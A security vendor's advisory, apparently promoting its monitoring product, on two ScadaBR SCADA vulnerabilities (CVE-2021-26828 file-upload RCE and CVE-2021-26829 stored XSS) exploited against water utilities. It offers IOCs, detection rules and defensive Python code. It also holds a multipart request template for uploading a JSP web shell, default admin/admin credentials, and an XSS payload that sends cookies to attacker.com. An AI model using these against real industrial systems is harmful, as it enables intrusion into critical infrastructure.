OpenPLC ScadaBR Vulnerabilities
CVE-2021-26828 (RCE) & CVE-2021-26829 (XSS) — ICS/SCADA Under Active Hacktivist Attack
ACTIVE ICS/SCADA EXPLOITATION
TwoNet Pro-Russian Hacktivist Group
The TwoNet hacktivist group is actively exploiting these vulnerabilities against water treatment facilities and critical infrastructure. Both CVEs have been added to the CISA Known Exploited Vulnerabilities catalog with mandatory remediation deadlines for federal agencies.
Attackers combine default ScadaBR credentials with CVE-2021-26828 to deploy JSP web shells, enabling remote command execution on ICS systems.
Report ID: INT-VA-2025-OPENPLC-SCADABR • TLP:CLEAR
Executive Summary
- Both CVEs added to CISA Known Exploited Vulnerabilities catalog
- Active exploitation by TwoNet pro-Russian hacktivist group
- Water treatment facilities confirmed as targets
- CISA deadlines: December 19, 2025 (XSS) and December 24, 2025 (RCE)
- Patches available since June 2021 — many ICS systems remain unpatched
OpenPLC ScadaBR is an open-source SCADA (Supervisory Control and Data Acquisition) Human-Machine Interface (HMI) system used in industrial control environments. Two vulnerabilities patched over three years ago are now being actively exploited against water treatment facilities by the pro-Russian hacktivist group TwoNet.
Vulnerability Overview
| CVE ID | Type | CVSS | CWE | Exploitability |
|---|---|---|---|---|
| CVE-2021-26828 | Remote Code Execution | 8.8 High | CWE-434 | Actively Exploited |
| CVE-2021-26829 | Stored XSS | 5.4 Medium | CWE-79 | Actively Exploited |
Why This Matters
Industrial control systems, particularly those managing water treatment and distribution, represent critical infrastructure that directly impacts public health and safety. The exploitation of these vulnerabilities by hacktivist groups demonstrates:
- Prolonged vulnerability window — ICS/OT systems often lag years behind in patching
- Low barrier to entry — Default credentials combined with known exploits enable unsophisticated attackers
- Cross-sector risk — ScadaBR deployments exist across water, energy, and manufacturing sectors
- Geopolitical targeting — Pro-Russian hacktivists specifically targeting Western infrastructure
Threat Actor: TwoNet
TwoNet is a pro-Russian hacktivist group that has emerged as a significant threat to operational technology (OT) and industrial control systems, particularly in the water sector. The group has been observed targeting SCADA systems in Western countries as part of broader geopolitical operations.
Attack Methodology
TwoNet's attack pattern against ScadaBR systems follows a predictable chain:
- Reconnaissance — Identify internet-exposed ScadaBR instances using Shodan, Censys, or similar tools
- Initial Access — Authenticate using default ScadaBR credentials (admin/admin)
- Exploitation — Upload malicious JSP web shell via CVE-2021-26828
- Post-Exploitation — Execute commands, modify SCADA configurations, or deploy additional payloads
TwoNet operates in coordination with other pro-Russian hacktivist groups targeting ICS infrastructure. See our Z-Pentest Threat Profile for related ICS targeting activity.
Affected Products
The vulnerabilities affect ScadaBR installations on both Linux and Windows platforms. Due to the nature of ICS/OT environments, many systems have not been updated since the patches were released in June 2021.
CVE-2021-26828 — Remote Code Execution
| Product | Platform | Vulnerable Versions | Fixed Version | Status |
|---|---|---|---|---|
| ScadaBR | Linux | < 0.9.1 | 0.9.1+ | Exploited |
CVE-2021-26829 — Stored Cross-Site Scripting
| Product | Platform | Vulnerable Versions | Fixed Version | Status |
|---|---|---|---|---|
| ScadaBR | Windows | < 1.12.4 | 1.12.4+ | Exploited |
Industrial control systems often operate on isolated networks with infrequent maintenance windows. Organizations should assess their ScadaBR deployments and prioritize patching based on network exposure and criticality.
Technical Analysis
CVE-2021-26828: Arbitrary File Upload (RCE)
This vulnerability exists in the upload functionality where ScadaBR allows authenticated users to upload files. Due to insufficient validation, attackers can upload JSP web shells that are then executed by the underlying Tomcat server.
Exploitation Chain — CVE-2021-26828
Vulnerable Upload Endpoint
```http
POST /ScadaBR/upload.shtm HTTP/1.1
Host: [target]
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary

------WebKitFormBoundary
Content-Disposition: form-data; name="file"; filename="shell.jsp"
Content-Type: application/octet-stream

[JSP web shell content]
------WebKitFormBoundary--
```
CVE-2021-26829: Stored Cross-Site Scripting
This vulnerability allows authenticated attackers to inject malicious JavaScript into ScadaBR that executes when other users view the affected page. This can be leveraged for credential theft or privilege escalation.
Exploitation Chain — CVE-2021-26829
Example XSS Payload
```html
<script>document.location='http://attacker.com/steal?c='+document.cookie</script>
```
Combined Attack Scenario
In observed attacks, TwoNet combines both vulnerabilities:
- Initial foothold — Use XSS to steal valid operator credentials
- Privilege escalation — Authenticate with stolen admin credentials
- Code execution — Upload JSP web shell via CVE-2021-26828
- Persistence — Maintain access to SCADA environment for future operations
Detection
Indicators of Compromise (IOCs)
Network Indicators
| Type | Indicator | Description |
|---|---|---|
| IP Address | 45.157.234[.]199 | TwoNet C2 Infrastructure |
| IP Address | 45.14.247[.]87 | TwoNet C2 Infrastructure |
File Indicators
| Type | Indicator | Description |
|---|---|---|
| File Path | /ScadaBR/uploads/*.jsp | Web shell upload location |
| File Extension | .jsp, .jspx | Suspicious uploads in ScadaBR |
| User Agent | python-requests/* | Automated exploitation tools |
Web Server Log Patterns
```text
# JSP file upload attempts
POST /ScadaBR/upload.shtm.*\.jsp
# Uploaded shell access
GET /ScadaBR/uploads/.*\.jsp
# Default credential authentication
POST /ScadaBR/login.htm.*admin
# XSS payload injection
.*<script>.*document\.cookie.*
```
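The patterns above are regular expressions over the request line, and the IOC tables give two C2 addresses and an automation user agent. The following is an added example, not part of the advisory, that applies all of them to Apache/Tomcat combined-format access log lines. The log lines are constructed for the example (RFC 5737 documentation addresses plus the two advisory IOCs), the `/ScadaBR/example_page.shtm` path is invented, and the request line is URL-decoded before matching so an encoded `%3Cscript%3E` still hits the XSS pattern.

```python
import re
from urllib.parse import unquote

# Network IOCs from the advisory's table (defanged there, refanged here for matching).
TWONET_C2_IPS = {"45.157.234.199", "45.14.247.87"}

# The advisory's four log patterns, applied to the URL-decoded request line.
PATTERNS = {
    "jsp_upload_attempt": re.compile(r"POST /ScadaBR/upload\.shtm.*\.jspx?\b", re.I),
    "web_shell_access":   re.compile(r"GET /ScadaBR/uploads/[^ ]*\.jspx?\b", re.I),
    "default_cred_login": re.compile(r"POST /ScadaBR/login\.htm.*admin", re.I),
    "xss_cookie_theft":   re.compile(r"<script>.*document\.cookie", re.I),
}

# Apache/Tomcat "combined" access log line: ip ident user [time] "request" status bytes "referer" "ua"
COMBINED = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?'
)

# Constructed sample log, not captured traffic. Line 2 is a realistic multipart upload:
# the filename is in the request body, so it is NOT visible to the upload pattern.
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Dec/2025:14:02:11 +0000] "POST /ScadaBR/login.htm?username=admin HTTP/1.1" 302 0 "-" "python-requests/2.31.0"',
    '203.0.113.10 - - [10/Dec/2025:14:02:13 +0000] "POST /ScadaBR/upload.shtm HTTP/1.1" 200 512 "-" "python-requests/2.31.0"',
    '203.0.113.10 - - [10/Dec/2025:14:02:15 +0000] "GET /ScadaBR/uploads/shell.jsp?cmd=id HTTP/1.1" 200 128 "-" "python-requests/2.31.0"',
    '198.51.100.7 - - [10/Dec/2025:14:05:00 +0000] "GET /ScadaBR/example_page.shtm?name=%3Cscript%3Edocument.location%3D%27http%3A%2F%2F203.0.113.99%2Fc%3Fc%3D%27%2Bdocument.cookie%3C%2Fscript%3E HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '45.157.234.199 - - [10/Dec/2025:14:09:30 +0000] "GET /ScadaBR/login.htm HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
    '192.0.2.50 - - [10/Dec/2025:14:10:02 +0000] "GET /ScadaBR/watch_list.shtm HTTP/1.1" 200 4096 "-" "Mozilla/5.0 (Windows NT 10.0)"',
]


def classify(line):
    """Parse one access log line and return its indicator hits (empty list if benign)."""
    m = COMBINED.match(line)
    if not m:
        return None
    request = unquote(m["request"])  # decode %3Cscript%3E etc. before pattern matching
    hits = [name for name, rx in PATTERNS.items() if rx.search(request)]
    if m["ip"] in TWONET_C2_IPS:
        hits.append("twonet_c2_ip")
    if (m["ua"] or "").startswith("python-requests/"):
        hits.append("automation_ua")
    return {"ip": m["ip"], "time": m["time"], "request": m["request"], "hits": hits}


def scan(lines):
    """Return one record per line that matched at least one indicator, in log order."""
    results = []
    for line in lines:
        rec = classify(line)
        if rec and rec["hits"]:
            results.append(rec)
    return results


if __name__ == "__main__":
    for rec in scan(SAMPLE_LOG):
        print(f'{rec["time"]} {rec["ip"]:16} {", ".join(rec["hits"])}  {rec["request"]}')
```

Two of the patterns only see what the access log records. A form-posted username and a multipart filename both travel in the request body, so the `login.htm` and `upload.shtm` patterns fire only when those values leak into the query string; the GET to `/ScadaBR/uploads/*.jsp` and the C2 address match are the dependable access-log signals, and the upload pattern belongs on a proxy or WAF log that records form fields.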
Detection Rules
Sigma Rule — JSP Upload Detection
```yaml
title: ScadaBR JSP Web Shell Upload Attempt
id: 8a2c5f91-4b3d-4e6a-9f8c-1a2b3c4d5e6f
status: experimental
description: Detects attempts to upload JSP files to ScadaBR
logsource:
  category: webserver
  product: apache
detection:
  selection:
    cs-uri-stem|contains: '/ScadaBR/upload'
    cs-method: 'POST'
  selection_jsp:
    # In a multipart upload the filename is in the request body, which access logs do
    # not record; this clause only fires when the filename appears in the query string.
    # Pair with the shell-access rule on GET /ScadaBR/uploads/*.jsp for coverage.
    cs-uri-query|contains:
      - '.jsp'
      - '.jspx'
  condition: selection and selection_jsp
level: high
tags:
  - attack.initial_access
  - attack.t1190
  - cve.2021.26828
```
Snort/Suricata Rule
```suricata
alert http any any -> any any (
    msg:"INTRUVENT - ScadaBR JSP Upload CVE-2021-26828";
    flow:established,to_server;
    http.method; content:"POST";
    http.uri; content:"/ScadaBR/upload";
    file.data; content:".jsp";
    classtype:web-application-attack;
    sid:2025002;
    rev:1;
)
alert http any any -> any any (
    msg:"INTRUVENT - ScadaBR Web Shell Access Attempt";
    flow:established,to_server;
    http.method; content:"GET";
    http.uri; content:"/ScadaBR/uploads/"; content:".jsp";
    classtype:web-application-attack;
    sid:2025003;
    rev:1;
)
```
Monitor ICS/SCADA Threats with BRACE
BRACE provides specialized detection for OT/ICS attacks including:
- ScadaBR web shell upload and access attempts
- TwoNet infrastructure IOC correlation
- CISA KEV vulnerability exploitation patterns
- Hacktivist activity targeting critical infrastructure
Remediation
CISA Known Exploited Vulnerabilities remediation deadlines:
- CVE-2021-26829 (XSS) — December 19, 2025
- CVE-2021-26828 (RCE) — December 24, 2025
Federal agencies are required to apply patches by these dates. All organizations should prioritize remediation immediately.
Patch Information
| CVE | Platform | Fixed Version | Action |
|---|---|---|---|
| CVE-2021-26828 | Linux | ScadaBR 0.9.1+ | Upgrade immediately |
| CVE-2021-26829 | Windows | ScadaBR 1.12.4+ | Upgrade immediately |
Immediate Actions
- Change default credentials — Replace admin/admin with strong, unique passwords
- Network segmentation — Ensure ScadaBR is not exposed to the internet
- Audit uploaded files — Review the /ScadaBR/uploads/ directory for .jsp files
- Apply patches — Upgrade to fixed versions (0.9.1+ Linux, 1.12.4+ Windows)
- Enable logging — Ensure web server access logs capture upload and authentication events
Network Segmentation Recommendations
- Firewall rules — Block all inbound internet traffic to ScadaBR systems
- DMZ architecture — Place SCADA HMI systems in isolated network segments
- VPN requirements — Require VPN for any remote access to OT networks
- Monitoring — Deploy IDS/IPS at OT network boundaries
- Allowlisting — Restrict upload file types to essential formats only
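The allowlisting item above, and the "insufficient validation" described under CVE-2021-26828, both come down to the same control: accept an upload only if its name passes a strict allowlist, never on the basis of the client-supplied Content-Type. The following added example, written for this page and not taken from ScadaBR's code base, shows such a check against the request shown in the technical analysis. The set of permitted extensions is an assumption for the example; the rejected set is the pair Tomcat maps to the JSP servlet by default (`.jsp`, `.jspx`) plus `.jspf` for good measure.

```python
import os
import re

# Upload types an HMI plausibly needs; an assumption for this example, not ScadaBR's config.
ALLOWED_EXTENSIONS = {".png", ".jpg", ".jpeg", ".gif", ".csv", ".xml"}
# Extensions Tomcat maps to the JSP servlet by default (.jsp, .jspx); .jspf added defensively.
# Rejected wherever they occur in the name, so "shell.jsp.png" does not slip through.
SERVER_SIDE_EXTENSIONS = {".jsp", ".jspx", ".jspf"}
# Conservative filename shape: starts alphanumeric, no spaces, no hidden files, bounded length.
SAFE_NAME = re.compile(r"^[A-Za-z0-9][A-Za-z0-9._-]{0,63}$")


class UploadRejected(ValueError):
    """Raised when a submitted filename fails validation."""


def sanitize_filename(raw):
    """Return a safe basename for the client-supplied filename or raise UploadRejected.

    The client-supplied Content-Type is deliberately ignored: it is attacker-controlled
    (the request in the advisory sends a JSP as application/octet-stream).
    """
    # Keep only the final path component, whichever separator the client used.
    name = raw.replace("\\", "/").rsplit("/", 1)[-1]
    if "\x00" in name:
        raise UploadRejected("NUL byte in filename")
    if not SAFE_NAME.fullmatch(name):
        raise UploadRejected(f"filename shape not allowed: {name!r}")
    segments = name.lower().split(".")
    extensions = ["." + s for s in segments[1:]]
    if not extensions:
        raise UploadRejected("filename has no extension")
    if any(ext in SERVER_SIDE_EXTENSIONS for ext in extensions):
        raise UploadRejected(f"server-executable extension in {name!r}")
    if extensions[-1] not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"extension {extensions[-1]!r} not on the allowlist")
    return name


def is_allowed(raw):
    """True if sanitize_filename accepts the name, False otherwise."""
    try:
        sanitize_filename(raw)
        return True
    except UploadRejected:
        return False


def store_upload(upload_dir, raw_filename, data):
    """Write the upload under upload_dir with the sanitized name, re-checking containment."""
    name = sanitize_filename(raw_filename)
    base = os.path.realpath(upload_dir)
    dest = os.path.realpath(os.path.join(base, name))
    if os.path.dirname(dest) != base:
        raise UploadRejected("destination escapes the upload directory")
    with open(dest, "wb") as fh:
        fh.write(data)
    return dest


if __name__ == "__main__":
    for candidate in ("diagram.png", "shell.jsp", "shell.JSP", "shell.jsp.png",
                      "../../webapps/ROOT/trend.csv", "report", ".htaccess"):
        print(f"{candidate!r:32} -> {'accept' if is_allowed(candidate) else 'reject'}")
```

Rejecting server-side extensions anywhere in the name, not just at the end, is what stops double-extension variants, and lower-casing before comparison handles the case-insensitive filesystems Windows deployments run on. Storing under a directory the servlet container does not serve as JSP at all would be a further layer, but that is a deployment decision rather than a validation one.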
Forensic Investigation Steps
If compromise is suspected, perform the following analysis:
- Review web server access logs for upload activity to /ScadaBR/upload.shtm
- Search for .jsp files in ScadaBR directories that were not part of the original installation
- Analyze authentication logs for default credential usage or brute-force attempts
- Check for connections to known TwoNet infrastructure (45.157.234[.]199, 45.14.247[.]87)
- Preserve and analyze any identified web shells for IOC extraction
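The second and fifth steps above, finding JSP files that were not part of the original installation and preserving hashes of anything found, can be scripted as a comparison against a manifest taken from a clean copy of the same ScadaBR version. This added example is not from the advisory; it builds a constructed clean tree and a constructed suspect tree in temporary directories (the `WEB-INF/jsp/...` paths and file contents are invented and do not reflect ScadaBR's real layout) and reports every `.jsp`/`.jspx` that is missing from the baseline or differs from it.

```python
import hashlib
import os
import tempfile
from datetime import datetime, timezone

JSP_EXTENSIONS = (".jsp", ".jspx")


def sha256_file(path):
    """Hash a file in chunks so large artefacts need not fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def _walk_jsp(root):
    """Yield (relative POSIX path, absolute path) for every .jsp/.jspx under root."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(JSP_EXTENSIONS):
                full = os.path.join(dirpath, name)
                yield os.path.relpath(full, root).replace(os.sep, "/"), full


def build_baseline(clean_root):
    """Manifest of a known-good install (same version, from trusted media)."""
    return {rel: sha256_file(full) for rel, full in _walk_jsp(clean_root)}


def find_unexpected_jsp(root, baseline):
    """Report JSP files absent from the baseline or whose content differs from it."""
    findings = []
    for rel, full in _walk_jsp(root):
        digest = sha256_file(full)
        if rel not in baseline:
            reason = "not in baseline"
        elif baseline[rel] != digest:
            reason = "modified since baseline"
        else:
            continue
        st = os.stat(full)
        findings.append({
            "path": rel,
            "sha256": digest,  # preserved for IOC extraction and sharing
            "size": st.st_size,
            "mtime": datetime.fromtimestamp(st.st_mtime, timezone.utc).isoformat(),
            "reason": reason,
        })
    return sorted(findings, key=lambda f: f["path"])


def _write(path, content):
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(content)


def build_sample_tree():
    """Construct a clean install and a suspect copy in temp dirs (layout is invented)."""
    base = tempfile.mkdtemp(prefix="scadabr-sweep-")
    clean, suspect = os.path.join(base, "clean"), os.path.join(base, "suspect")
    shipped = {
        "WEB-INF/jsp/login.jsp": b"<%-- shipped login page (constructed) --%>",
        "WEB-INF/jsp/watchList.jsp": b"<%-- shipped watch list (constructed) --%>",
    }
    for root in (clean, suspect):
        for rel, content in shipped.items():
            _write(os.path.join(root, rel), content)
    # Suspect host: one shipped page altered, two foreign files in the upload path,
    # plus a harmless CSV that must not be reported.
    _write(os.path.join(suspect, "WEB-INF/jsp/login.jsp"), b"<%-- altered page (constructed) --%>")
    _write(os.path.join(suspect, "uploads/shell.jsp"), b"<%-- placeholder for an uploaded file --%>")
    _write(os.path.join(suspect, "uploads/cmd.jspx"), b"<%-- placeholder for an uploaded file --%>")
    _write(os.path.join(suspect, "uploads/report.csv"), b"tag,value\n")
    return clean, suspect


if __name__ == "__main__":
    clean_root, suspect_root = build_sample_tree()
    for f in find_unexpected_jsp(suspect_root, build_baseline(clean_root)):
        print(f'{f["reason"]:24} {f["path"]}  sha256={f["sha256"]}  mtime={f["mtime"]}')
```

Comparing hashes rather than names alone is what catches a shipped page that was overwritten with a shell, and recording size, mtime and digest at discovery time gives the investigator the values needed for the IOC extraction step before the file is moved or imaged.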
Protect Your Critical Infrastructure
BRACE monitors for exploitation of ICS/SCADA vulnerabilities and hacktivist activity targeting operational technology environments.